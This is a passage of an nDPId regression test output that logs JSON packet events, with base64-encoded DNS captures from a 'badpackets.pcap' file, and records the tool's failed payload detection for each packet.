00642{"packet_event_id":1,"packet_event_name":"packet","packet_id":48,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":282,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":282,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvxEgADcRsUa4rRdszLpQ5QA1oygGwFz7eMKEEAABAAQAAAABDWp1ZGljaWFsd2F0Y2gDb3JnAAAwAAHADAAwAAEAAA4QAQgBAAMHAwEAAdl6vxiL++F\/pjIKqj9e7RaBV5rwA3o9DNcv0h4HQ93WZJ+2YrrhIVTBghHPFs+8FEN7Xdx2djyC1pjSprgXQ2HeWbJZy1rO2CCoH12hxAbUEQnPy1BYYsMpATL7FFzDIup6CYAV7Is7xTwPl\/Wm5B0cxltQlAHAlLMQiylRrZup5SRgZQGoi1q7dsIP6kgvfOSmZGIwr5OxtBC\/RzC+7OcNnmbexBAx\/ujQjwn1ITH0JeAIU+9jiKC+"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":48,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":248,"global_ts_msec":1495451574398} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":48,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":248,"global_ts_msec":1495451574398}
00473{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":49,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXceY4gADMRzHRRW60TzLpQ5QA1plQGOJZ\/AaiEEAABAAIABAAJCGdyZG5zLWRlBWRlbmljAmRlAAABAAHADAABAAEAAA4QAARRW6FQwAwALgABAAAOEADcAAEIAwAADhBZNR2QWSKokGYrBWRlbmljAmRlAJfVO1vdsL8bdrClwW8="} 00459{"packet_event_id":1,"packet_event_name":"packet","packet_id":49,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":146,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":146,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXceY4gADMRzHRRW60TzLpQ5QA1plQGOJZ\/AaiEEAABAAIABAAJCGdyZG5zLWRlBWRlbmljAmRlAAABAAHADAABAAEAAA4QAARRW6FQwAwALgABAAAOEADcAAEIAwAADhBZNR2QWSKokGYrBWRlbmljAmRlAJfVO1vdsL8bdrClwW8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":49,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":112,"global_ts_msec":1495451582606} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":49,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":112,"global_ts_msec":1495451582606}
00453{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":50,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":131,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc\/D8gADMRuiiBBg0DzLpQ5QA1arUGKRUJU+aEEAABAAEAAgANAzEwMgE0AzE2MwMxMzIHSU4tQUREUgRBUlBBAAAMAAHADAAMAAEAAAcIAB0GdGltZS1iCHRpbWVmcmVxB2JsZHJkb2MDZ292AMASAAI="} 00439{"packet_event_id":1,"packet_event_name":"packet","packet_id":50,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":131,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":131,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXc\/D8gADMRuiiBBg0DzLpQ5QA1arUGKRUJU+aEEAABAAEAAgANAzEwMgE0AzE2MwMxMzIHSU4tQUREUgRBUlBBAAAMAAHADAAMAAEAAAcIAB0GdGltZS1iCHRpbWVmcmVxB2JsZHJkb2MDZ292AMASAAI="}
00219{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":50,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":97,"global_ts_msec":1495451603049} 00205{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":50,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":97,"global_ts_msec":1495451603049}
00698{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":51,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":314,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcDxkgADkRXROili+vzLpQ5QA1TDYG4IL0xMOEAAABAAYABgABDmxpbmVhci10dmUtcGlsA3RvcAdjb21jYXN0A25ldAAAMAABwAwAMAABAAAAPACIAQADBQMBAAG7xRiYkSu1FrneRCH6ntrsauJWLw6fk1RtMzYYwMb16Knn1SeDLbMj6jRuPHc\/N9CDpNHKBwY7D8GGYJHtQOlY1BRgtvcl2XG\/z4KT5bOP8sBaXSr1Q60QyLTjEldwC8Hcrwfq0nlgSqdeedPWUZEiInPjf0m6Q0yG3lTY3p3jMcAMADAAAQAAADwBCAEBAwUDAQABl4a8UCzCZt5CAPJ1+RL9MCCZmtygIfM+1EkpxZWzKFW6hTlX1fvx29DxB35W993mMAjv0961og8="} 00684{"packet_event_id":1,"packet_event_name":"packet","packet_id":51,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":314,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcDxkgADkRXROili+vzLpQ5QA1TDYG4IL0xMOEAAABAAYABgABDmxpbmVhci10dmUtcGlsA3RvcAdjb21jYXN0A25ldAAAMAABwAwAMAABAAAAPACIAQADBQMBAAG7xRiYkSu1FrneRCH6ntrsauJWLw6fk1RtMzYYwMb16Knn1SeDLbMj6jRuPHc\/N9CDpNHKBwY7D8GGYJHtQOlY1BRgtvcl2XG\/z4KT5bOP8sBaXSr1Q60QyLTjEldwC8Hcrwfq0nlgSqdeedPWUZEiInPjf0m6Q0yG3lTY3p3jMcAMADAAAQAAADwBCAEBAwUDAQABl4a8UCzCZt5CAPJ1+RL9MCCZmtygIfM+1EkpxZWzKFW6hTlX1fvx29DxB35W993mMAjv0961og8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":51,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":280,"global_ts_msec":1495451611805} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":51,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":280,"global_ts_msec":1495451611805}
01302{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":52,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"eLr5aHlnxDRrta3ICABFAAXccLkgAEAR7frMulDlQpiWJQA17AcIoOzEWyCBoAABAAMABAANBnRpbWUtYQRuaXN0A2dvdgAAAQABwAwAAQABAAALHAAEgQYPHMAMAC4AAQAACxwAnAABBwMAAAcIWSp7HVkhN25NKgRuaXN0A2dvdgCGDxP8mtTYURB\/z7B7zxG9M2cDPFjwCkCpyC8hiadTCV1wXBnQsMkH14gORQid9hZZkwqvAJKxlHHGFpFXs3GK70k31UcnglQglR+Jb8PvkvYMpqGZLiMdOZ+8aMQzLgN424FbMJ7np\/GSsY0NKbDsZWUKs5FEyvfl5LyBAXKP1cAMAC4AAQAACxwAnAABBwMAAAcIWSp7HVkhN25p9QRuaXN0A2dvdgCYOPJp1LyXHjTZERVC1mhE\/fFAgBPnHg5CzHCfHFW\/kHrSlPUKJrKTtWO2J6nhnsslWGL7StwY\/Ds0w3d1K1BK2EXHmf7JoxCpUcbjrJzE2AWNOuFyYMsitmrbg7hKpTz5YORW9N+9SgnPiRBdVePJPZ0ZX+5rKPwGXiVkzOvJt8ATAAIAAQAAAIYABgNnZWHAE8ATAAIAAQAAAIYABgNiZWHAE8ATAC4AAQAAAIYAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMATAC4AAQAAAIYAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"} 01288{"packet_event_id":1,"packet_event_name":"packet","packet_id":52,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":762,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"eLr5aHlnxDRrta3ICABFAAXccLkgAEAR7frMulDlQpiWJQA17AcIoOzEWyCBoAABAAMABAANBnRpbWUtYQRuaXN0A2dvdgAAAQABwAwAAQABAAALHAAEgQYPHMAMAC4AAQAACxwAnAABBwMAAAcIWSp7HVkhN25NKgRuaXN0A2dvdgCGDxP8mtTYURB\/z7B7zxG9M2cDPFjwCkCpyC8hiadTCV1wXBnQsMkH14gORQid9hZZkwqvAJKxlHHGFpFXs3GK70k31UcnglQglR+Jb8PvkvYMpqGZLiMdOZ+8aMQzLgN424FbMJ7np\/GSsY0NKbDsZWUKs5FEyvfl5LyBAXKP1cAMAC4AAQAACxwAnAABBwMAAAcIWSp7HVkhN25p9QRuaXN0A2dvdgCYOPJp1LyXHjTZERVC1mhE\/fFAgBPnHg5CzHCfHFW\/kHrSlPUKJrKTtWO2J6nhnsslWGL7StwY\/Ds0w3d1K1BK2EXHmf7JoxCpUcbjrJzE2AWNOuFyYMsitmrbg7hKpTz5YORW9N+9SgnPiRBdVePJPZ0ZX+5rKPwGXiVkzOvJt8ATAAIAAQAAAIYABgNnZWHAE8ATAAIAAQAAAIYABgNiZWHAE8ATAC4AAQAAAIYAnAACBwIAAAcIWSpvIFkhMlpNKgRuaXN0A2dvdgB\/AugCl6Rz+sTdMBLd\/b9WzbTmwtSJRElGSiFaNkIXGL85DwZ8CN5XIraessCeREIcUwZxVSCZqTN+jQfSqvs0RCCsELGmZy1\/6te8q\/BHGZ6r5Yfp\/FixyK0YEzCx9kE6yxKwCHgAiZ9RYjXpdk7jwKD9iHCh9psgrmi4EqWisMATAC4AAQAAAIYAnAACBwIAAAcIWSpvIFkhMlpp9QRuaXN0A2dvdgClTY7jIx2EAO1rRXMS+rZG5e8+PelDpKXOMRzGWIjrQbBJVXqIaZDLeBgBTWgx3tBkiLlUy1bOdR3MF5sPTTggHRJuEc8rRcMhHY6s0g2zr9CNylE8o5Mcs+HT"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":52,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451613183} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":52,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":728,"global_ts_msec":1495451613183}
00959{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":53,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcdRkgAPQRTW+A50ABzLpQ5QA17tYHop3j4riEEAABAAIABQANBnN0YXRpYwZwdWJtZWQDZ292AAABAAHADAAFAAEAAVGAAB0JcHVibWVkZ292A3dpcARuY2JpA25sbQNuaWjAGsAMAC4AAQABUYABHgAFBwMAAVGAWr+PY1jk82PoEAZwdWJtZWQDZ292AJu6kQSEhR8egq7iff9kNvnUi3EB8Cqxahn7\/xnKCblnIeeP205Pcfvq58wdpFd4t2tLrbNoUdrfjjrIvtJTNm8AczdH8VxTTwKlZ544pPbKqSowUHJH8kt1BYbS08C6W\/koWBsjtLuk2wwJn3Xv1EHHGFTmeMXVa9Ykgp+szm4UYdPEnokSrW0ySALEqeqR1T8NYKCXtsBVthVcDs6IE2iJWsUHfJN\/ND5yD6NryHs5EYO0a5uiDSFdbl2a1e3U2IiqRcHf12Yi7nNig+en76ODdO7CGdj4XsXz8AYWndn30mHl316TfYk9Tr8TfkagYqHqYLV3kzp8Pim2wy5nSI7AOQACAAEAABwgAAkGZ3NsYjAxwELAOQACAAEAABwgAAkGZ3NsYjAywELAOQACAAEAABwgAAkGZ3NsYjAzwELAOQArAAEAAVGAABiP2QcBjJqKhZbbxHR4uEOouQ=="} 00945{"packet_event_id":1,"packet_event_name":"packet","packet_id":53,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcdRkgAPQRTW+A50ABzLpQ5QA17tYHop3j4riEEAABAAIABQANBnN0YXRpYwZwdWJtZWQDZ292AAABAAHADAAFAAEAAVGAAB0JcHVibWVkZ292A3dpcARuY2JpA25sbQNuaWjAGsAMAC4AAQABUYABHgAFBwMAAVGAWr+PY1jk82PoEAZwdWJtZWQDZ292AJu6kQSEhR8egq7iff9kNvnUi3EB8Cqxahn7\/xnKCblnIeeP205Pcfvq58wdpFd4t2tLrbNoUdrfjjrIvtJTNm8AczdH8VxTTwKlZ544pPbKqSowUHJH8kt1BYbS08C6W\/koWBsjtLuk2wwJn3Xv1EHHGFTmeMXVa9Ykgp+szm4UYdPEnokSrW0ySALEqeqR1T8NYKCXtsBVthVcDs6IE2iJWsUHfJN\/ND5yD6NryHs5EYO0a5uiDSFdbl2a1e3U2IiqRcHf12Yi7nNig+en76ODdO7CGdj4XsXz8AYWndn30mHl316TfYk9Tr8TfkagYqHqYLV3kzp8Pim2wy5nSI7AOQACAAEAABwgAAkGZ3NsYjAxwELAOQACAAEAABwgAAkGZ3NsYjAywELAOQACAAEAABwgAAkGZ3NsYjAzwELAOQArAAEAAVGAABiP2QcBjJqKhZbbxHR4uEOouQ=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":53,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1495451617290} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":53,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1495451617290}
01276{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":54,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":738,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":738,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXccB0gAPMREnGA54D7zLpQ5QA1qyQOUPvPZ1uEEAABAAIABgATCWRuczEtbmNiaQRuY2JpA25sbQNuaWgDZ292AAABAAHADAABAAEAAVGAAASCDh0fwAwALgABAAFRgAEkAAEHBQABUYBaAL7qWRNw6s2+BG5jYmkDbmxtA25paANnb3YAqynlZlaIB4Smw1gmrgrhShXsg+fKpc9IVq+H0d8Wqe8ehWyuxMN5VtfcEaLC+EeL8bzU4KuotzpGoDCkxCZdXFHPVKuaX1nzyQKnX1ljBf8NzdObkudu7m5LKsZKBwHSNYuTy0jN791rNwOkeHjeiejuoDZvEfDwRbyO1nFBJ6h8isnkI\/0kQNd0201HZH6RGOQ2KqsqoOWUQCZawvaoql571eZD0z3ieQ\/7FwpiQ9vz\/VUXzC+SYsOOT1yPoZ8c6dYCXQY8gwTNOCDqJaGJMkzo17QL1DHP4vbFEiU+nL7o8yPZTSu\/e0+\/Z3T7PU000lQYL9r0d4LlePbetu84y8BaAAIAAQAADhAAAsAMwFoAAgABAAAOEAAGA25zM8BjwFoAAgABAAAOEAAGA25zMsBjwFoAAgABAAAOEAAFAm5zwGPAWgACAAEAAA4QAAwJZG5zMi1uY2JpwFrAWgAuAAEAAA4QASQAAgcEAAAOEFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgA+EebMkCne2CNH9\/msBB1ttxS45FhdXCD5iR18dVqPuT200zDdV4BFS01NU4MYeoc3XDyOxIWfU7WKy5Zs94YsWp3mz1cDLKuZG3MK\/hBxOol\/fcuIoTQU9\/sEzYKep6XHZu6d5e\/CGkcUh2Vks9\/pyJ\/t2s2KBguZm2e\/qZ1Ezxt4cEtu9kc0sswh6yWPsWme\/zxCgcrwhF4ZRmacvc+rMVf\/a\/AghKUmUTfCHDsCeW2IcVFuIY0PYQvO0ixv6F67"} 01262{"packet_event_id":1,"packet_event_name":"packet","packet_id":54,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":738,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":738,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXccB0gAPMREnGA54D7zLpQ5QA1qyQOUPvPZ1uEEAABAAIABgATCWRuczEtbmNiaQRuY2JpA25sbQNuaWgDZ292AAABAAHADAABAAEAAVGAAASCDh0fwAwALgABAAFRgAEkAAEHBQABUYBaAL7qWRNw6s2+BG5jYmkDbmxtA25paANnb3YAqynlZlaIB4Smw1gmrgrhShXsg+fKpc9IVq+H0d8Wqe8ehWyuxMN5VtfcEaLC+EeL8bzU4KuotzpGoDCkxCZdXFHPVKuaX1nzyQKnX1ljBf8NzdObkudu7m5LKsZKBwHSNYuTy0jN791rNwOkeHjeiejuoDZvEfDwRbyO1nFBJ6h8isnkI\/0kQNd0201HZH6RGOQ2KqsqoOWUQCZawvaoql571eZD0z3ieQ\/7FwpiQ9vz\/VUXzC+SYsOOT1yPoZ8c6dYCXQY8gwTNOCDqJaGJMkzo17QL1DHP4vbFEiU+nL7o8yPZTSu\/e0+\/Z3T7PU000lQYL9r0d4LlePbetu84y8BaAAIAAQAADhAAAsAMwFoAAgABAAAOEAAGA25zM8BjwFoAAgABAAAOEAAGA25zMsBjwFoAAgABAAAOEAAFAm5zwGPAWgACAAEAAA4QAAwJZG5zMi1uY2JpwFrAWgAuAAEAAA4QASQAAgcEAAAOEFoAvupZE3Dqzb4EbmNiaQNubG0DbmloA2dvdgA+EebMkCne2CNH9\/msBB1ttxS45FhdXCD5iR18dVqPuT200zDdV4BFS01NU4MYeoc3XDyOxIWfU7WKy5Zs94YsWp3mz1cDLKuZG3MK\/hBxOol\/fcuIoTQU9\/sEzYKep6XHZu6d5e\/CGkcUh2Vks9\/pyJ\/t2s2KBguZm2e\/qZ1Ezxt4cEtu9kc0sswh6yWPsWme\/zxCgcrwhF4ZRmacvc+rMVf\/a\/AghKUmUTfCHDsCeW2IcVFuIY0PYQvO0ixv6F67"}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":54,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":704,"global_ts_msec":1495451617292} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":54,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":704,"global_ts_msec":1495451617292}
00752{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":55,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":353,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvUsgADcR9T6JyAQfzLpQ5QA1fIMHB7MjfFCEEAABAAIABQAPBGRuczEDc3NhA2dvdgAAAQABwAwAAQABAAAAPAAEicgrCMAMAC4AAQAAADwAmwABBwMAAAA8WUE2n1kZn1cHPQNzc2EDZ292AC5156k1jArAQVGBahVpB6i1h\/fLJ3i\/HJY8GxrDrwsXIly+1WH6d7kRKc6lk\/uZf0+AmaTOUahspZVRqb7TH6GrbnsyXZmTfc3Kzu2iCB1GZM+ThGuuBfTJP\/RUgJK9tEeQ4pfMuSB5LQOaizURDpM8RAEaHBNs8UiaB2wYxjm8wEwAAgABAACMoAAHBGRuczbATMBMAAIAAQAAjKAAAsAMwEwAAgABAACMoAAHBGRuczLATMBMAAIAAQAAjKAABwRkbnM1wEzATAAuAAEAAIygAJsAAgcCAACMoFlBLTxZGZ8="} 00738{"packet_event_id":1,"packet_event_name":"packet","packet_id":55,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":353,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":353,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcvUsgADcR9T6JyAQfzLpQ5QA1fIMHB7MjfFCEEAABAAIABQAPBGRuczEDc3NhA2dvdgAAAQABwAwAAQABAAAAPAAEicgrCMAMAC4AAQAAADwAmwABBwMAAAA8WUE2n1kZn1cHPQNzc2EDZ292AC5156k1jArAQVGBahVpB6i1h\/fLJ3i\/HJY8GxrDrwsXIly+1WH6d7kRKc6lk\/uZf0+AmaTOUahspZVRqb7TH6GrbnsyXZmTfc3Kzu2iCB1GZM+ThGuuBfTJP\/RUgJK9tEeQ4pfMuSB5LQOaizURDpM8RAEaHBNs8UiaB2wYxjm8wEwAAgABAACMoAAHBGRuczbATMBMAAIAAQAAjKAAAsAMwEwAAgABAACMoAAHBGRuczLATMBMAAIAAQAAjKAABwRkbnM1wEzATAAuAAEAAIygAJsAAgcCAACMoFlBLTxZGZ8="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":55,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":319,"global_ts_msec":1495451618089} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":55,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":319,"global_ts_msec":1495451618089}
00764{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":56,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":361,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsBcgADIR1CChNyACzLpQ5QA1FUYM12ePIm2EEAABAAYABAANA21hZwRuY2VwBG5vYWEDZ292AAABAAHADAAFAAEAAAEsAAsDbWFnBGNwcmvAEMAMAC4AAQAAASwBIQAFBQQAAAEsWSuLaVkiUOlQZARuY2VwBG5vYWEDZ292ADcGQyBFP4D+oljdb2+uDa9\/19GSwvR6WriPq+5z0bu\/0ZaU\/D8IQsmXY34oOVHWkzG6MucH8ZmcfTOJDErUlSNSiRzFT51PBmw6nGKnxTSwXkETkX04Oo9QP2yzVDt5BovyB6C9tXHehSkdYBFKv3dkwzGxANJxhe+yFBxgwF9UCs8+cZEJOlz8tn056cIu0n8cLm0Luw3FG\/hQGfvItzUlOxBl1A60sdiGmy6QUdNCXAcNU0yZ9pOPKxcCxUBH4IhMSpEnUlvPR6QJH5nmfUQe2XEJKZYxCw=="} 00750{"packet_event_id":1,"packet_event_name":"packet","packet_id":56,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":361,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":361,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcsBcgADIR1CChNyACzLpQ5QA1FUYM12ePIm2EEAABAAYABAANA21hZwRuY2VwBG5vYWEDZ292AAABAAHADAAFAAEAAAEsAAsDbWFnBGNwcmvAEMAMAC4AAQAAASwBIQAFBQQAAAEsWSuLaVkiUOlQZARuY2VwBG5vYWEDZ292ADcGQyBFP4D+oljdb2+uDa9\/19GSwvR6WriPq+5z0bu\/0ZaU\/D8IQsmXY34oOVHWkzG6MucH8ZmcfTOJDErUlSNSiRzFT51PBmw6nGKnxTSwXkETkX04Oo9QP2yzVDt5BovyB6C9tXHehSkdYBFKv3dkwzGxANJxhe+yFBxgwF9UCs8+cZEJOlz8tn056cIu0n8cLm0Luw3FG\/hQGfvItzUlOxBl1A60sdiGmy6QUdNCXAcNU0yZ9pOPKxcCxUBH4IhMSpEnUlvPR6QJH5nmfUQe2XEJKZYxCw=="}
00220{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":56,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":327,"global_ts_msec":1495451619519} 00206{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":56,"source":"badpackets.pcap","alias":"nDPId-test","l4_data_len":327,"global_ts_msec":1495451619519}
00952{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":57,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+sgADgR3T6MWiHtzLpQ5QA1+sANYy2s8YiEEAABAA8ABAANA3d3dwNuaGMEbm9hYQNnb3YAAAEAAcAMAAUAAQAAASwADwhlZGdlLW53cwN3b2PAFMAMAC4AAQAAASwBIAAFBQQAAAEsWSuLeVkiUPkyEANuaGMEbm9hYQNnb3YAmdicnE8euFUxTHUXfeUJmy6UvdRd01G3Waurvp4SxZ2PJZgNPzjjITBMLV6ecU4\/JueThrSlKZCbDqf7PO1nwK30oVaMXimjEp\/WM+cq2lYinJ+rRAUpOFrU1\/PMoKmi\/NA9YhzR1i84ntUn6pU7gPRsC1l0stlJvmpn5vPK2SEpb2eW0Gowmg8iUnJq32XYuUvIED4TSMnVkgyeOVQyRuntLmYEqOLIN1Y4bfKDTdnt4ooZOC4nZltsnzRyIjkMnu6GUtEuSBRaXw7\/LMILqzp94rUYZ+A0FpoK\/AokSahDQC+1b+t0iMHL6XYsjM4sNHxXO6pg\/DJfgn7ZWUE0hMAuAAUAAQAAASwADAdlZGdlLXAxAWzAX8AuAC4AAQAAASwBIAAFBQQAAAEsWSuLyFkiUUi\/jgN3b2MEbm9hYQNnb3YAkE66gKhT1JcM2kgWKvIXOPPjjmHF901em1sV2mJv"} 00938{"packet_event_id":1,"packet_event_name":"packet","packet_id":57,"source":"badpackets.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":501,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":501,"pkt_l4_len":0,"thread_ts_msec":0,"pkt":"xDRrta3IeLr5aHlnCABFAAXcs+sgADgR3T6MWiHtzLpQ5QA1+sANYy2s8YiEEAABAA8ABAANA3d3dwNuaGMEbm9hYQNnb3YAAAEAAcAMAAUAAQAAASwADwhlZGdlLW53cwN3b2PAFMAMAC4AAQAAASwBIAAFBQQAAAEsWSuLeVkiUPkyEANuaGMEbm9hYQNnb3YAmdicnE8euFUxTHUXfeUJmy6UvdRd01G3Waurvp4SxZ2PJZgNPzjjITBMLV6ecU4\/JueThrSlKZCbDqf7PO1nwK30oVaMXimjEp\/WM+cq2lYinJ+rRAUpOFrU1\/PMoKmi\/NA9YhzR1i84ntUn6pU7gPRsC1l0stlJvmpn5vPK2SEpb2eW0Gowmg8iUnJq32XYuUvIED4TSMnVkgyeOVQyRuntLmYEqOLIN1Y4bfKDTdnt4ooZOC4nZltsnzRyIjkMnu6GUtEuSBRaXw7\/LMILqzp94rUYZ+A0FpoK\/AokSahDQC+1b+t0iMHL6XYsjM4sNHxXO6pg\/DJfgn7ZWUE0hMAuAAUAAQAAASwADAdlZGdlLXAxAWzAX8AuAC4AAQAAASwBIAAFBQQAAAEsWSuLyFkiUUi\/jgN3b2MEbm9hYQNnb3YAk